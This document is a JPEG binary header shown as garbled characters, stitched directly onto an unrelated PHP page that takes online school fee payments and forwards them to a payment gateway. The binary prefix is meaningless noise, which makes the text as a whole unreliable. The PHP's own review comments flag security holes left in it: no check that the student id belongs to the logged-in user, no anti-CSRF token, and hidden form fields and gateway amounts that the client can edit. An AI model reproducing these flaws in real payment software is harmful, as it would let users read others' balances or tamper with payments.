JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? 
q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4

<?php
include("php/dbconnect.php");
include("php/checklogin.php");
include("php/header.php");

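// Receipt reference for this request. Further down it is stored in payment.receipt_no and
// posted to the payment gateway as both Ref and Description.
// random_int() (PHP 7+) draws from the operating system CSPRNG, so a reference cannot be
// predicted from earlier ones the way mt_rand() output can.
// NOTE(review): nothing visible here guarantees uniqueness; confirm payment.receipt_no has a
// UNIQUE index, or regenerate on collision.
$receipt_no = 'AB-' . random_int(10000, 99999999);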

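  // Payment entry point. The five identifiers below arrive in the query string and are
  // attacker-controlled: each must be present and a plain string (`?std_id[]=x` arrays are
  // rejected), and every one of them reaches SQL only as a bound parameter.
  $hasAllParams = true;
  foreach (['std_id', 'pay_id', 'term_id', 'session_id', 'class_id'] as $paramName) {
    if (!isset($_GET[$paramName]) || !is_string($_GET[$paramName])) {
      $hasAllParams = false;
      break;
    }
  }

  if ($hasAllParams) {

    // Runs one parameterised SELECT and returns its first row with numeric and associative
    // keys (mysqli_fetch_array), or null when the statement cannot be prepared or executed
    // or matches no row. mysqli_stmt_get_result() requires the mysqlnd driver.
    $fetchFirstRow = static function ($conn, $sql, $types, array $params) {
      $stmt = mysqli_prepare($conn, $sql);
      if ($stmt === false) {
        return null;
      }
      $firstRow = null;
      if (mysqli_stmt_bind_param($stmt, $types, ...$params) && mysqli_stmt_execute($stmt)) {
        $result = mysqli_stmt_get_result($stmt);
        if ($result !== false) {
          $firstRow = mysqli_fetch_array($result);
          mysqli_free_result($result);
        }
      }
      mysqli_stmt_close($stmt);
      return $firstRow;
    };

    // Escapes a value for a single-quoted HTML attribute (ENT_QUOTES covers both quote styles).
    $esc = static function ($value) {
      return htmlspecialchars((string)$value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    };

    // Reads a POST field as a string; a missing or array-valued field becomes ''.
    $postValue = static function ($key) {
      return (isset($_POST[$key]) && is_string($_POST[$key])) ? $_POST[$key] : '';
    };

    $ID         = $_GET['std_id'];
    $pay_id     = $_GET['pay_id'];
    $term_id    = $_GET['term_id'];
    $session_id = $_GET['session_id'];
    $class_id   = $_GET['class_id'];

    // NOTE(review): $row is not defined in this file; presumably one of the includes loads the
    // logged-in student's record. Nothing below checks that the std_id in the URL (or the one
    // posted back by the form) belongs to that student, so an authenticated user can read
    // balances for, or record a payment against, another student by editing the id. Confirm
    // ownership is enforced in checklogin.php or add the comparison here.
    $name = explode(" ", $row['std_name'], 2);
    $std_name = $row['std_name'];

    // Payment row referenced by the URL; supplies the fee breakdown copied into the new row.
    $row1 = $fetchFirstRow($conn, "SELECT * FROM payment WHERE pay_id = ?", 's', [$pay_id]);

    // Most recent successful payment for this student, session, term and class; its balance
    // is the ceiling for the amount accepted below and is shown on the page.
    $row0 = $fetchFirstRow(
      $conn,
      "SELECT * FROM payment WHERE std_id = ? AND session_id = ? AND term_id = ? AND class_id = ? AND trans_status = 'success' ORDER BY pay_id DESC",
      'ssss',
      [$ID, $session_id, $term_id, $class_id]
    );

    $row0a = $fetchFirstRow($conn, "SELECT * FROM class WHERE class_id = ?", 's', [$class_id]);
    $class_arm = $row0a['class_arm'];

    $class_group_id = $row['class_group_id'];
    $row03 = $fetchFirstRow($conn, "SELECT * FROM fee WHERE class_group_id = ?", 's', [(string)$class_group_id]);

    // Form defaults; overwritten from POST when the form is submitted.
    $std_id='';
    $class_id='';
    $class_group_id='';
    $session_id='';
    $term_id='';
    $amount='';
    $date='';
    $narration='';
    $class_amount='';
    $status='';
    $trans_status='';

    // NOTE(review): no anti-CSRF token is checked before the insert below.
    if (isset($_POST['save'])) {

      // Raw values on purpose: they are bound as parameters, so escaping them first would
      // store the backslashes. The hidden fields (std_id, class_id, class_group_id, date,
      // status) are client-controlled despite being hidden.
      $std_id         = $postValue('std_id');
      $class_id       = $postValue('class_id');
      $class_group_id = $postValue('class_group_id');
      $session_id     = $postValue('session_id');
      $term_id        = $postValue('term_id');
      $date           = $postValue('date');
      $narration      = $postValue('narration');
      $status         = $postValue('status');

      // The amount box inserts comma thousands separators client-side; strip only those.
      // Anything else (sign, decimal point, letters) is rejected instead of being silently
      // rewritten: dropping the dot used to turn "15.50" into 1550.
      $amount = str_replace(',', '', trim($postValue('amount')));
      $amountIsValid = preg_match('/^[0-9]{1,12}$/', $amount) === 1 && (int)$amount > 0;

      // Guardian phone and e-mail are both sent to the gateway, so both must be on file.
      $incompleteProfile = $fetchFirstRow(
        $conn,
        "SELECT std_id FROM student WHERE std_id = ? AND (pg_phone = '' OR pg_email = '')",
        's',
        [$std_id]
      );

      if (is_array($incompleteProfile)) {
        // Stop after redirecting so nothing else runs for this request. If output has
        // already started the header cannot be sent, so fall through and re-render the form.
        if (!headers_sent()) {
          header("Location: update_profile?act=xwspvt3");
          exit;
        }
      } elseif (!$amountIsValid) {
        $message1 ="<div class='alert alert-danger alert-dismissible fade show' role='alert'>
    <i class='bi bi-exclamation-octagon me-1'></i>
    <strong>Sorry!</strong> Please enter the amount as a whole number greater than zero.
    <button type='button' class='btn-close' data-bs-dismiss='alert' aria-label='Close'></button>
  </div>";
      } else {
        $amount = (int)$amount;

        // Payment engine parameters ($baseUrl comes from an include).
        $returnUrl = $baseUrl.'return_payment.php';
        $receiptUrl = $baseUrl.'receipt/receipt.php';

        // Fee breakdown copied from the payment row named in the URL.
        $staff_rebate  = $row1['staff_rebate'];
        $tuition       = $row1['tuition'];
        $boarding_fee  = $row1['boarding_fee'];
        $class_amount  = $row1['class_amount'];
        $boarding_name = $row1['boarding_name'];
        $actual_fee    = $row1['actual_fee'];
        $discount      = $row1['discount'];
        $other_fee     = $row1['other_fee'];

        $row4 = $fetchFirstRow($conn, "SELECT * FROM session WHERE session_id = ?", 's', [$session_id]);
        $session = $row4['session_name'];

        $row5 = $fetchFirstRow($conn, "SELECT * FROM term WHERE term_id = ?", 's', [$term_id]);
        $term = $row5['term_name'];

        // Running total of successful payments for the term, plus this one.
        $row6 = $fetchFirstRow(
          $conn,
          "SELECT sum(amount_paid) as total FROM payment WHERE std_id = ? and term_id = ? and session_id = ? and trans_status = 'success'",
          'sss',
          [$ID, $term_id, $session_id]
        );
        $sum = $row6['total'];
        $total = $sum + $amount;
        $balance = $class_amount - $total;

        $row7 = $fetchFirstRow(
          $conn,
          "SELECT * FROM payment WHERE std_id = ? and term_id = ? and session_id = ? and trans_status = 'success' ORDER BY pay_id DESC",
          'sss',
          [$ID, $term_id, $session_id]
        );
        $prev_bal = $row7['balance'];
        $prev_amount = $row7['total'];

        $p_balance = $row0['balance'];

        // Refuse to take more than the outstanding balance.
        if ($amount > $p_balance) {

          $message1 ="<div class='alert alert-danger alert-dismissible fade show' role='alert'>
    <i class='bi bi-exclamation-octagon me-1'></i>
    <strong>Sorry!</strong> You can not pay above the required balance.
    <button type='button' class='btn-close' data-bs-dismiss='alert' aria-label='Close'></button>
  </div>";

        } else {

          // Column => value map for the new row. Values are cast to strings so a missing
          // lookup is written as '' exactly as the interpolated query wrote it.
          $paymentRow = [
            'std_id'         => $std_id,
            'std_name'       => $std_name,
            'class_arm'      => $class_arm,
            'term'           => $term,
            'session'        => $session,
            'class_id'       => $class_id,
            'class_group_id' => $class_group_id,
            'session_id'     => $session_id,
            'term_id'        => $term_id,
            'amount_paid'    => $amount,
            'mode_payment'   => 'Online',
            'date'           => $date,
            'narration'      => $narration,
            'total'          => $total,
            'balance'        => $balance,
            'prev_amount'    => $prev_amount,
            'prev_bal'       => $prev_bal,
            'staff_rebate'   => $staff_rebate,
            'tuition'        => $tuition,
            'boarding_fee'   => $boarding_fee,
            'boarding_name'  => $boarding_name,
            'class_amount'   => $class_amount,
            'receipt_no'     => $receipt_no,
            'actual_fee'     => $actual_fee,
            'discount'       => $discount,
            'other_fee'      => $other_fee,
            'online'         => 'readonly',
          ];
          $insertValues = array_map('strval', array_values($paymentRow));
          $insertSql = "INSERT INTO payment (" . implode(',', array_keys($paymentRow)) . ") VALUES ("
            . implode(',', array_fill(0, count($insertValues), '?')) . ")";

          $inserted = false;
          $transactionId = 0;
          $insertStmt = mysqli_prepare($conn, $insertSql);
          if ($insertStmt !== false) {
            mysqli_stmt_bind_param($insertStmt, str_repeat('s', count($insertValues)), ...$insertValues);
            $inserted = mysqli_stmt_execute($insertStmt);
            // Id of the row just written; assumes pay_id is AUTO_INCREMENT (TODO confirm).
            $transactionId = mysqli_stmt_insert_id($insertStmt);
            mysqli_stmt_close($insertStmt);
          }

          if ($inserted === true) {

            // Fall back to the newest row for this student only when the driver reports no
            // generated id; that lookup can return another request's row under concurrency.
            if (!$transactionId) {
              $row101 = $fetchFirstRow(
                $conn,
                "SELECT * FROM payment WHERE std_id = ? and term_id = ? and session_id = ? ORDER BY pay_id DESC",
                'sss',
                [$ID, $term_id, $session_id]
              );
              $transactionId = $row101['pay_id'];
            }

            echo  'Form Submitted, you will be redirected in few seconds to the payment platform.......';

            // NOTE(review): this form is submitted by the browser, so Amount and TransactionID
            // can be changed before they reach the gateway. The return handler (not visible
            // here) should confirm the paid amount with the gateway before marking the row
            // successful.
            $gatewayFields = [
              'Email'         => $row['pg_email'],
              'FirstName'     => $name[0],
              'LastName'      => isset($name[1]) ? $name[1] : '', // single-word names have no second part
              'Phone'         => $row['pg_phone'],
              'TransactionID' => $transactionId,
              'Amount'        => $amount,
              'MerchantID'    => $MerchantId,
              'UniqueID'      => $UniqueId,
              'FeeId'         => $FeeId,
              'returnUrl'     => $returnUrl,
              'Ref'           => $receipt_no,
              'Description'   => $receipt_no,
              'receiptUrl'    => $receiptUrl,
            ];

            echo "<form method='POST' action='" . $esc($post_url) . "'>";
            foreach ($gatewayFields as $fieldName => $fieldValue) {
              // Stored profile data is escaped so it cannot break out of the attribute.
              echo "<input type='hidden' name = '" . $fieldName . "' value='" . $esc($fieldValue) . "'>";
            }
            echo "</form>";

            /** Auto submit form. Alternatively, a submit button can be put in its stead. */
            echo "<script language='javascript'>";
            echo "var form = document.forms[0];";
            echo "form.submit()</script>";
          }
        }
      }
    }
    // The enclosing if ($hasAllParams) block stays open here; it is closed by the
    // `<?php } ?>` that follows the payment form markup.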

?>
<style>
.error {color: #FF0000;}
</style>
<script>
    /**
     * onsubmit guard for the payment form: blocks submission while the amount box is empty.
     * Returns false to cancel the submit, otherwise undefined so the submit proceeds.
     * This is a convenience check only; the amount must still be validated on the server.
     */
    function validateForm() {
      const enteredAmount = document.forms.form.amount.value;
      if (enteredAmount != "") {
        return;
      }
      alert("Please Enter Amount");
      return false;
    }
</script>

  <main id="main" class="main">
    <div class="pagetitle">
      <h1>Make Payment</h1>
      <nav>
        <ol class="breadcrumb">
          <li class="breadcrumb-item"><a href="index">Home</a></li>
          <li class="breadcrumb-item"><a href="pay_info"> << Back </a> </li>
          <li class="breadcrumb-item active">Online Payment</li>
        </ol>
      </nav>
    </div><!-- End Page Title -->
    <section class="section" >
      <div class="row" >
        <div class="col-lg-8">
        <div class="alert alert-primary bg-info text-light border-0 alert-dismissible fade show" role="alert">
        <div class="panel-heading" align="right">
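               <?php /* Name and class arm are stored data: HTML-escape them so markup saved in a profile is shown as text instead of being executed. */ ?>
               <h3 align="left" class="panel-title"><?php echo htmlspecialchars(ucwords((string)$row['std_name']), ENT_QUOTES, 'UTF-8'); ?> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Of &nbsp;&nbsp;&nbsp;&nbsp;<b><?php echo htmlspecialchars((string)$row0a['class_arm'], ENT_QUOTES, 'UTF-8'); ?></b></h3>
              <?php /* The cast keeps number_format() working when no earlier successful payment row was found. */ ?>
              <h3>Balance To Pay:  &#8358; <?php echo number_format((float)$row0['balance']); ?> </h3>  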
            </div>
         </div>

          <div class="card">
            <div class="card-body">
              <h5 class="card-title"><?php if (isset($message1)) {  echo $message1; } ?> </h5>
              <!-- Horizontal Form -->
              <form  action="" method="POST" name="form" class="row g-3 needs-validation" novalidate onsubmit="return validateForm()" enctype="multipart/form-data">
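                <?php /* Hidden fields are defaults only: the browser can change every one of them, so the POST handler must not trust them for identity or pricing. Values are escaped for the attribute context. */ ?>
                <input type="hidden" name="std_id" value="<?php echo htmlspecialchars((string)$row['std_id'], ENT_QUOTES, 'UTF-8'); ?>">
                <input type="hidden" name="class_id" value="<?php echo htmlspecialchars((string)$row['class_id'], ENT_QUOTES, 'UTF-8'); ?>">
                <input type="hidden" name="class_group_id" value="<?php echo htmlspecialchars((string)$row['class_group_id'], ENT_QUOTES, 'UTF-8'); ?>">
                <input type="hidden"  name="date" value="<?php echo date("Y-m-d")?>" />
                <input type="hidden"  name="pay_amount" value="<?php echo htmlspecialchars((string)$row1['class_amount'], ENT_QUOTES, 'UTF-8'); ?>" />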
                <input type="hidden"  name="status" value="active" />
                <div class="row mb-3">
                  <label for="inputEmail3" class="col-sm-2 col-form-label">Session</label>
                  <div class="col-sm-6">
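                  <select class="form-select" name="session_id" readonly>
                      <?php
                        // Resolve the session name for the single option shown. The id is bound as a
                        // parameter rather than interpolated, and both id and name are escaped on output.
                        // `readonly` does not lock a <select>; the submitted session_id is still user input.
                        $session_id1 = (string)$row0['session_id'];
                        $sessionName = '';
                        $sessionStmt = $conn->prepare("select session_name from session where session_id = ?");
                        if ($sessionStmt !== false) {
                            $sessionStmt->bind_param('s', $session_id1);
                            if ($sessionStmt->execute()) {
                                $sessionStmt->bind_result($sessionName);
                                $sessionStmt->fetch();
                            }
                            $sessionStmt->close();
                        }
                      ?>
                      <option value="<?php echo htmlspecialchars($session_id1, ENT_QUOTES, 'UTF-8'); ?>"><?php echo htmlspecialchars((string)$sessionName, ENT_QUOTES, 'UTF-8'); ?></option>
                    </select>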
                  </div>
                </div>
                <div class="row mb-3">
                  <label for="inputEmail3" class="col-sm-2 col-form-label">Term</label>
                  <div class="col-sm-6">
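                  <select class="form-select" name="term_id" readonly>
                      <?php
                        // Resolve the term name for the single option shown. The id is bound as a
                        // parameter rather than interpolated, and both id and name are escaped on output.
                        // `readonly` does not lock a <select>; the submitted term_id is still user input.
                        $term_id1 = (string)$row0['term_id'];
                        $termName = '';
                        $termStmt = $conn->prepare("select term_name from term where term_id = ?");
                        if ($termStmt !== false) {
                            $termStmt->bind_param('s', $term_id1);
                            if ($termStmt->execute()) {
                                $termStmt->bind_result($termName);
                                $termStmt->fetch();
                            }
                            $termStmt->close();
                        }
                      ?>
                      <option value="<?php echo htmlspecialchars($term_id1, ENT_QUOTES, 'UTF-8'); ?>"><?php echo htmlspecialchars((string)$termName, ENT_QUOTES, 'UTF-8'); ?></option>
                    </select>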
                  </div>
                </div>
                <div class="row mb-3 position-relative">
                  <label for="validationTooltip04" class="col-sm-2 col-form-label">Amount <span class="error">*</span></label>
                  <div class="col-sm-6">
                  <div class="form-control">
                    <input  class="number" aria-label="Default select example" id="validationTooltip04" name="amount" placeholder="Enter Amount" value="" />
                    <div class="invalid-tooltip">
                    Please select the amount you want to pay.
                  </div>
                  </div>
                </div>
                </div>
                <div class="row mb-3">
                  <label for="inputPassword3" class="col-sm-2 col-form-label">Narration</label>
                  <div class="col-sm-10">
                <textarea name="narration" id="tArea" cols="50" oninput="limitChar(this)" maxlength="50" class="form-control"  id="floatingTextarea" style="height: 70px;"></textarea>
                <p align="left" id="charCounter">50 Characters limit</p>
              </div>
                </div>
                <div class="text-center">
                  <button type="submit" name="save" class="btn btn-primary">Submit</button>
                  <button type="reset" class="btn btn-secondary">Clear</button>
                </div>
              </form><!-- End Horizontal Form -->
          <?php } ?>
            </div>
          </div>
        </div>

    </section>

  </main><!-- End #main -->

  <!-- Character Limit in Javascript -->
<script>
    /**
     * oninput handler for the narration box: shows how many of the 50 allowed
     * characters are left and trims anything typed or pasted beyond the limit.
     * The limit is enforced in the browser only.
     */
    let limitChar = (element) => {
        const maxChar = 50;

        const field = document.getElementById(element.id);
        const counter = document.getElementById('charCounter');
        const used = field.value.length;

        counter.innerHTML = maxChar - used + ' characters remaining';

        if (used <= maxChar) {
            return;
        }

        // Over the limit: keep the first maxChar characters and pin the counter at zero.
        field.value = field.value.substring(0, maxChar);
        counter.innerHTML = 0 + ' characters remaining';
    }

</script>

<!-- Amount formatted with comma thousands separators (JavaScript) -->
<script >
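  // Live formatting for the amount box: keeps digits only and inserts a comma
  // before every group of three digits as the user types.
  var el = document.querySelector('input.number');
  // The amount input is rendered only when the page received its query parameters,
  // while this script is always emitted; without the guard it throws on a null element.
  if (el) {
    el.addEventListener('keyup', function (event) {
      // Key codes 37-40 are the arrow keys: they only move the caret, so leave the value alone.
      if (event.which >= 37 && event.which <= 40) return;

      this.value = this.value.replace(/\D/g, '')
                             .replace(/\B(?=(\d{3})+(?!\d))/g, ',');
    });
  }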
</script>

<?php
include('footer.php');
?>
